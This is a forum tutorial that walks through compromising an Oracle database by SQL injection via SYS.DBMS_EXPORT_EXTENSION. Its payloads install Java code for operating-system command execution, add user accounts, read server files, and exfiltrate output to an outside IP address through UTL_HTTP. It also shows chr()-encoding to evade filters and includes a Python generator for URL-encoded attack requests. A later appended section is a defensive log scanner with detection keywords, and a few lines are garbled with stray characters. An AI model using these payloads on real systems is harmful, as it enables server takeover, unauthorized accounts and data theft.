A step-by-step demonstration of obtaining a cmdshell through Oracle injection

Posted 2012-12-18 12:21:48
Everything below was run in a web-based SQL*Plus. When injecting through a web application, rewrite each select SYS.DBMS_EXPORT_EXTENSION..... into the form

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

The 'a'|| prefix makes the condition true whatever the subquery returns (even NULL), so the page renders normally as long as the injected statement executes without error. The statements are long, so they will usually have to be submitted by POST.

Two things must hold for any of this to work: the application's database account must be able to execute SYS.DBMS_EXPORT_EXTENSION (PUBLIC held that grant on unpatched releases of the time), and the package must still be the unpatched version, which runs the PL/SQL smuggled into its third argument with the definer's rights of SYS. That is why every statement below executes as SYS although the web account itself is unprivileged.

The steps are as follows:
1. Create the package

Injecting through SYS.DBMS_EXPORT_EXTENSION, create a Java source named LinxUtil inside Oracle with two methods: runCMD, which runs an operating-system command and returns its standard output, and readFile, which returns the contents of a file. The Java code runs inside the database's own JVM, so commands execute as the operating-system account the Oracle process runs under.

/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL length is limited, the readFile() block can be left out:

/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)

In that case also leave out the statements in the later steps that deal with readFile().
------------------------------
2. Grant Java permissions

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual

This gives PUBLIC a java.io.FilePermission with the execute action on every file, which is what Runtime.exec() needs. Note the quoting: a single quote that belongs to the innermost statement is written as eight quotes here, because the statement passes through three nested string levels and each level doubles it. If readFile() later fails with a Java security exception, grant the read action in the same way.
3. Create the functions

PL/SQL wrappers that call the two Java methods:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant PUBLIC the right to execute the functions

Because the statements run as SYS, the functions were created in the SYS schema; the web application's account can only call them after they are granted:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Test whether the steps above succeeded

and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)

and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)

The names are upper case because the functions were created without double quotes. Do not put a prefix such as '11'|| in front of these subqueries: '1'<>'11'||... is true whether or not the object exists and therefore proves nothing. Without a prefix, the subquery returns NULL when the function is missing, the comparison evaluates to NULL, and the page responds differently from the normal request.
6. Execute commands

/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)

/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>" (the implicit conversion of the output to a number raises an error).

To see the command output, use union (the column count and types must match the original query):

/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual

or send it out of band with UTL_HTTP.request:

/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)

/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)

Note: with UTL_HTTP.request the spaces and newlines have to be replaced with REPLACE(), otherwise the HTTP request cannot be sent. The newline must be written as chr(10): Oracle does not interpret backslash escapes, so '\n' would only match a literal backslash followed by n. utl_encode.base64_encode also works; it takes and returns RAW, so wrap the input in utl_raw.cast_to_raw() and the output in utl_raw.cast_to_varchar2(). The request is issued by the database server itself, so that host needs outbound HTTP access (and, from 11g onward, a network ACL that permits it).
" @- N( A/ c* r! C/ q4 }-------------------- 1 f" K% u- g$ }& G" }# G
6.内部变化 & F. h1 |: W- n& p( C
通过以下命令可以查看all_objects表达改变: . D2 Y) n7 g5 o- h! a. i
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
8 D0 d: m+ s8 e0 D6 L5 f' p7.删除我们创建的函数 ' ]) j/ A: q2 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 U3 F# f: g2 _2 m# [0 x) X0 V
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 6 n8 p3 g# O0 p! y: F# `
====================================================
End of article. Dedicated to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test for the vulnerability:
Create an Oracle account:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual

Equivalently, spelled out with chr() so that the request contains no quote characters at all. Here each string argument is written as the value Oracle sees after parsing the literal, so the quotes around the DECLARE block become a single chr(39) and those around the CREATE USER statement become chr(39)||chr(39), instead of the '' and '''' of the quoted form:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual

Confirm that the vulnerability exists (user_id is a number, so the plain 1<> form works here):

and 1<>(
select user_id from all_users where username='LINXSQL'
)

Give linxsql the right to connect:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual

Delete the account:

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
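The quote doubling in every payload above and the chr() spelling just shown follow one mechanical rule, and getting it wrong by hand is the usual reason such a request fails silently. The following Python is an added example, not code from the original post: it builds both forms from a plain PL/SQL statement and reproduces the page's strings byte for byte. FOO, BAR, the :P1 bind, 'SYS' and the trailing 0,'1',0 are the page's own arguments; the base URL and parameter name given to inject_get are placeholders.

```python
"""Assemble the nested-quote DBMS_EXPORT_EXTENSION payloads used in this post.

Added example, not part of the original post.  It only builds strings and
never talks to a database.  FOO/BAR, :P1, 'SYS' and 0,'1',0 are the page's
arguments; base_url and param in inject_get() are placeholders.
"""
from urllib.parse import quote


def q(s: str) -> str:
    """Escape s for embedding inside one more level of '...' (quote doubling)."""
    return s.replace("'", "''")


def build_arg(stmt: str, bind: str = ":P1") -> str:
    """Third argument of GET_DOMAIN_INDEX_TABLES as the value Oracle sees after
    parsing the outer literal.  stmt sits inside two EXECUTE IMMEDIATE levels,
    so its own quotes are doubled twice at this point."""
    inner = ("DECLARE PRAGMA AUTONOMOUS_TRANSACTION;"
             "BEGIN EXECUTE IMMEDIATE '" + q(stmt) + "';END;")
    return 'DBMS_OUTPUT".PUT(' + bind + ");EXECUTE IMMEDIATE '" + q(inner) + "';END;--"


def build_payload(stmt: str, bind: str = ":P1") -> str:
    """select ... from dual that runs stmt with SYS privileges (quoted form).
    The third level of doubling happens here, so one quote in stmt -> eight."""
    return ("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES("
            "'FOO','BAR','" + q(build_arg(stmt, bind)) + "','SYS',0,'1',0) from dual")


def chr_encode(s: str) -> str:
    """Spell a string as chr(n)||chr(n)||... so the request carries no quotes."""
    return "||".join(f"chr({ord(c)})" for c in s)


def build_payload_chr(stmt: str, bind: str = ":P1") -> str:
    """Same statement with every string argument written as a chr() chain.
    The argument is NOT doubled a third time: a chr() chain is an expression,
    not a literal, so the outermost quoting level no longer exists."""
    return ("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES("
            + chr_encode("FOO") + "," + chr_encode("BAR") + ","
            + chr_encode(build_arg(stmt, bind)) + "," + chr_encode("SYS")
            + ",0," + chr_encode("1") + ",0) from dual")


def blind_param(value: str, payload: str) -> str:
    """Parameter value in the page's blind form: 1 and '1'<>'a'||(payload)."""
    return f"{value} and '1'<>'a'||({payload})"


def inject_get(base_url: str, param: str, value: str, payload: str) -> str:
    """GET URL with the parameter percent-encoded (quotes, spaces, || and
    parentheses all need it).  The page notes the result is usually long
    enough that POST is required; the encoded value is the same either way."""
    return f"{base_url}?{param}={quote(blind_param(value, payload), safe='')}"


if __name__ == "__main__":
    stmt = "CREATE USER linxsql IDENTIFIED BY linxsql"
    print(build_payload(stmt, bind="1"))
    print(build_payload_chr(stmt))
    print(inject_get("http://target.example/xxx.jsp", "id", "1", build_payload(stmt)))
```

build_arg() returns what a WAF or a DBA reading the SQL trace actually sees, which is why the chr() form carries only six chr(39) entries while the quoted form needs up to eight consecutive quotes.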
======================
The following creates a function Linx_query() that executes an arbitrary statement and returns the number 1 on success. It is declared authid current_user, so it runs with the privileges of whoever calls it (through the web application, probably nothing beyond PUBLIC), which limits its usefulness; if it is really needed, consider first using the SYS-level injection above to grant dba to the application's current user. Note also that it has no PRAGMA AUTONOMOUS_TRANSACTION, so when it is called from a SELECT it can only run statements that are allowed inside a query; DDL or DML through it raises an error.

1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
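The post stops at the attacker's side. As an added example that is not part of the original, the Python below shows what the same requests look like to a defender reading web access logs. Its sample log lines are constructed for the example (placeholder addresses and an attacker.example callback host in the UTL_HTTP line). It URL-decodes twice, expands chr() chains like the one in the "another way to test" section, strips inline comments and collapses doubled quotes before matching keywords, so the chr()-spelled request that hides AUTONOMOUS_TRANSACTION from a plain substring search is still caught. Only GET query strings are inspected; the POST bodies the post recommends for long payloads need request-body or WAF logging and can be passed through normalize() the same way.

```python
"""Scan web access logs for the DBMS_EXPORT_EXTENSION injection pattern.

Added example, not part of the original post.  LOG_LINES are constructed in
Apache/NGINX combined format; IPs, timestamps and attacker.example are
placeholders.  Only the GET query string is inspected here.
"""
import re
from urllib.parse import unquote_plus

# Tokens taken from the page's payloads, matched after normalisation.
SUSPICIOUS = (
    "DBMS_EXPORT_EXTENSION",
    "GET_DOMAIN_INDEX_TABLES",
    "EXECUTE IMMEDIATE",
    "AUTONOMOUS_TRANSACTION",
    "DBMS_JAVA.GRANT_PERMISSION",
    "JAVA SOURCE NAMED",
    "UTL_HTTP.REQUEST",
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)
CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\|\|\s*chr\(\d+\))*", re.IGNORECASE)
CHR_ONE = re.compile(r"chr\((\d+)\)", re.IGNORECASE)


def decode_chr_chains(s: str) -> str:
    """Turn chr(68)||chr(66)||... runs back into the text they spell."""
    return CHR_CHAIN.sub(
        lambda m: "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0))), s)


def normalize(query: str) -> str:
    """Strip the layers that defeat naive substring matching: URL encoding
    (applied twice to catch double-encoded requests), chr() chains, inline
    /* */ comments, PL/SQL quote doubling and irregular whitespace."""
    s = unquote_plus(unquote_plus(query))
    s = decode_chr_chains(s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"'+", "'", s)       # '''' and '' both read as one quote
    s = re.sub(r"\s+", " ", s)
    return s.upper()


def scan_line(line: str):
    """Return {'ip', 'status', 'hits'} when the request uses the technique, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = m.group("path").partition("?")[2]
    if not query:
        return None
    norm = normalize(query)
    hits = [t for t in SUSPICIOUS if t in norm]
    return {"ip": m.group("ip"), "status": m.group("status"), "hits": hits} if hits else None


def scan_lines(lines):
    """All suspicious records from an iterable of log lines, in order."""
    return [r for r in (scan_line(l) for l in lines) if r]


def naive_hit(line: str, token: str) -> bool:
    """What a single URL-decode plus substring match would see, for comparison."""
    m = LOG_RE.match(line)
    return bool(m) and token.upper() in unquote_plus(m.group("path")).upper()


def _chr_chain(s: str) -> str:
    """Constructed input only: spell s as chr(n)%7C%7Cchr(n)... as it appears in a URL."""
    return "%7C%7C".join(f"chr({ord(c)})" for c in s)


LOG_LINES = [  # constructed for this example
    '10.0.0.5 - - [18/Dec/2012:12:21:48 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [18/Dec/2012:12:22:03 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27%7C%7C'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,%27DBMS_OUTPUT%22.PUT(1);'
    'EXECUTE%20IMMEDIATE%20%27%27DECLARE%20PRAGMA%20AUTONOMOUS_TRANSACTION;BEGIN%20EXECUTE%20IMMEDIATE%20'
    '%27%27%27%27grant%20all%20on%20LinxRunCMD%20to%20public%27%27%27%27;END;%27%27;END;--%27,%27SYS%27,0,%271%27,0)'
    '%20from%20dual) HTTP/1.1" 200 5120',
    '10.0.0.9 - - [18/Dec/2012:12:23:41 +0800] "GET /xxx.jsp?id=1%20and%201%3C%3E'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(' + _chr_chain("FOO") + ',' + _chr_chain("BAR") + ','
    + _chr_chain("EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION") + ',' + _chr_chain("SYS")
    + ',0,chr(49),0)%20from%20dual) HTTP/1.1" 500 312',
    '10.0.0.9 - - [18/Dec/2012:12:25:10 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E(SELECT%20UTL_HTTP.request'
    '(%27http://attacker.example/record.php?a=%27%7C%7Csys.LinxRunCMD(%27cmd%20/c%20net%20user%27))%20FROM%20dual)'
    ' HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for rec in scan_lines(LOG_LINES):
        print(rec)
```

The 500 on the chr() line is typical: an injected statement that failed still reached the database, so a status filter must not drop it. On the database side the lasting fix is Oracle's patch for DBMS_EXPORT_EXTENSION; revoking PUBLIC's EXECUTE on the package is the usual interim step, and dba_java_policy and dba_objects show whether the grant and the objects from steps 1 to 4 are already present.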